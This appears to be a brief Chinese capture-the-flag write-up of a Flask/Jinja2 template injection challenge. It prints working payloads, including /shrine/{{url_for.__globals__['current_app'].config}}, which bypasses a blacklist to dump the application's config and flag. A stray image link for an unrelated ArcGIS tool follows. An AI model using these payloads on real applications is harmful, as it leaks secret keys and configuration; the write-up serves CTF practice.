打开题目
直接查看源代码
发现注册了一个名为FLAG的config,这里可能有flag,
存在flask-jinja2模板注入,
并且存在黑名单过滤
输入shrine/{{7*7}}验证成功
通过url_for()与globals()函数,绕过黑名单
/shrine/{{url_for.__globals__}}
发现了current_app()函数
查看这个里面的config。
/shrine/{{url_for.__globals__['current_app'].config}}
得到flag
![[更新]ARCGIS之土地耕地占补平衡、进出平衡系统报备坐标txt格式批量导出工具(定制开发版)](https://img-blog.csdnimg.cn/direct/456dc85e991d42f685c026ca693dde49.png)
